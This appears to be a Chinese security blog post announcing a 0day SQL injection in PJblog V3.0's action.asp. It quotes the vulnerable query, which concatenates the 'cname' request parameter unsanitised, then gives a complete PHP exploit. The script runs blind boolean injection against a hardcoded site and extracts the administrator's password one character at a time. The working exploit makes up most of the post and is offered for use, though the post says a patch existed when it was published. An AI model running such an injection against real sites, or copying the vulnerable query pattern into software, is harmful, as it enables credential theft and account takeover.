PJblog V3.0 0day+EXP

影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp

第14行:
  1. strcname=request(“cname”)
  2.   set checkcdb=conn.execute(“select * from blog_Content where log_cname=”“”&strcname&“”“”)

Exp:

  1. <?php
  2. /*
  3. PJblog V3.0 0day exp
  4. code by 小蟑螂&bink
  5. www.0kee.com    www.t00ls.net
  6. 09.04.22
  7. */
  8.  
  9. $url=“http://www.pjhome.net”;    //注入地址
  10. $var_name=“puterjam”;    //管理员
  11. $var_key=“check_right”;    
  12.  
  13. if ($_SESSION[“LenI”]){
  14.     $LenI=$_SESSION[“LenI”];
  15. }else{
  16.     $LenI=1;
  17. }
  18. for($i=$LenI;$i<=40;$i++){
  19.     if($_SESSION[“LenDo”]){
  20.         $StaAsc=$_SESSION[“LenDo”];
  21.     }else{
  22.         $StaAsc=31;
  23.     }
  24.     echo “Scan password len:”.$i.” ;asc form “.$StaAsc.” to 127″;
  25.     for($j=$StaAsc;$j<=127;$j++){
  26.         $newurl=$url.‘/action.asp?action=checkAlias&cname=firebug_plugins_firediff”%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c’.$i.‘%2c1%29%29%20From%20blog_member%20where%20mem_name=\”.$var_name.‘\’%29%3e’.$j.‘%20and%20″1″=”1′;
  27.         $var_pagelen=file_get_contents($newurl);
  28.         $var_newpagelen=strpos($var_pagelen,$var_key);
  29.         if($var_newpagelen == true){
  30.             $_SESSION[“tmpPassWord”]=$_SESSION[“tmpPassWord”].chr($j);
  31.             unset($_SESSION[“LenDo”]);
  32.             $_SESSION[“LenI”]=$i+1;
  33.             doReload();
  34.             break;
  35.         }
  36.         if($j == $StaAsc+10){
  37.             doReload();
  38.             break;
  39.         }
  40.     }
  41. }
  42. if ($_SESSION[“LenI”]==40 && !($_SESSION[“LenDo”])){ echo $_SESSION[“tmpPassWord”]; }
  43.  
  44.  
  45. function doReload(){
  46. ?>
  47.     <script  language=“javascript”>  
  48.     <!–  
  49.     window.setTimeout(‘location.reload()’,1000);  
  50.     //–>  
  51.     </script>
  52. <?php
  53. }
  54. ?>
  55.  

此文发布时官方已经打了补丁

 

 

 

发表评论

电子邮件地址不会被公开。

您可以使用这些HTML标签和属性: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>